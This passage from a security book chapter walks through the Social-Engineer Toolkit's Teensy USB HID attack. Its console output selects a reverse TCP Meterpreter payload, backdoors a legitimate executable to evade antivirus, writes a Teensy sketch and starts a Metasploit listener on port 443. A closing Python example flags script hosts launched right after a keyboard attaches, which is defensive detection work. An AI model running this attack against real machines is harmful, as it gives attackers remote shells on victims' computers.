Chapter 10

Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 2

Do you want to create a payload and listener yes or no: yes

What payload do you want to generate:

Name:                                      Description:

. . . SNIP . . .

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

. . . SNIP . . .

16. Backdoored Executable (BEST)

Enter your choice (enter for default):

[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable

[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.

[*] Launching MSF Listener...
resource (src/program_junk/meta_config)> exploit -j

[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

To begin setting up this attack, choose Teensy USB HID Attack Vector from the main menu, and then choose WSCRIPT HTTP GET MSF Payload. Then tell SET to set up a payload and listener, selecting the default Meterpreter payload and encoding method.
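From the defender's side, the menu above shows what to watch for: a board that enumerates as a USB keyboard, followed by a PowerShell or WSCRIPT launch. The sketch below is an added example, not code from SET or from this book; it correlates keyboard-attach events with script-host process starts on the same host. The event schema, field names, `correlate` function and sample records are all assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (hypothetical schema): a normalized feed of
# device-attach and process-start records from endpoint logging.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "ws1", "kind": "device_attach",
     "device_class": "Keyboard"},
    {"ts": "2024-05-01T09:00:04", "host": "ws1", "kind": "process_start",
     "image": "C:\\Windows\\System32\\cmd.exe"},
    {"ts": "2024-05-01T09:00:09", "host": "ws1", "kind": "process_start",
     "image": "C:\\Windows\\System32\\wscript.exe"},
    # Script host with no preceding keyboard attach: not flagged.
    {"ts": "2024-05-01T11:30:00", "host": "ws2", "kind": "process_start",
     "image": "wscript.exe"},
    # Keyboard attached, but the script host starts 45 minutes later.
    {"ts": "2024-05-01T12:00:00", "host": "ws3", "kind": "device_attach",
     "device_class": "Keyboard"},
    {"ts": "2024-05-01T12:45:00", "host": "ws3", "kind": "process_start",
     "image": "powershell.exe"},
    # A storage device, not a keyboard: ignored by this rule.
    {"ts": "2024-05-01T13:00:00", "host": "ws4", "kind": "device_attach",
     "device_class": "DiskDrive"},
    {"ts": "2024-05-01T13:00:05", "host": "ws4", "kind": "process_start",
     "image": "wscript.exe"},
]

# Script hosts named in the SET Teensy menu (PowerShell and WSCRIPT options).
SCRIPT_HOSTS = {"wscript.exe", "powershell.exe"}


def correlate(events, window_seconds=30):
    """Return alerts for script hosts started soon after a keyboard attach."""
    window = timedelta(seconds=window_seconds)
    last_attach = {}  # host -> time of the most recent keyboard attach
    alerts = []
    # Timestamps share one ISO 8601 format, so string order is time order.
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["kind"] == "device_attach":
            if ev.get("device_class", "").lower() == "keyboard":
                last_attach[ev["host"]] = ts
        elif ev["kind"] == "process_start":
            # Reduce a full Windows path to its lowercase file name.
            image = ev["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
            attached = last_attach.get(ev["host"])
            if image in SCRIPT_HOSTS and attached and ts - attached <= window:
                alerts.append({"host": ev["host"], "image": image,
                               "delay_s": (ts - attached).total_seconds()})
    return alerts
```

The 30-second default window is a tuning assumption; legitimate keyboard reconnects (docking stations, KVM switches) will need allow-listing in practice.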